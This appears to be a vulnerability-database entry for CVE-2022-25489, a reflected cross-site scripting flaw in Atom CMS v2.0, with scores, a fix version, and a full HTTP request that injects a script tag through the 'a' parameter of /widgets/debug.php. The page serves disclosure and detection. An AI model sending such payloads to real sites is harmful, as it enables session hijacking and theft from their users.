🔙 목록으로 돌아가기

CVE-2022-25489: Atom CMS v2.0 - Cross-Site Scripting

TitleAtom CMS v2.0 - Cross-Site Scripting
Authortheamanrawat
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
RemediationFixed in version Atom CMS v2.1
CVSS Score5.4
EPSS Score0.08481
CVE IDCVE-2022-25489
CWE IDCWE-79
Tags cve cve2022 xss atom cms thedigitalcraft vuln

🔍 Vulnerability Description

Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the “A” parameter in /widgets/debug.php.

🌐 HTTP Request

GET /widgets/debug.php?a=<script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25489.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-25489.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A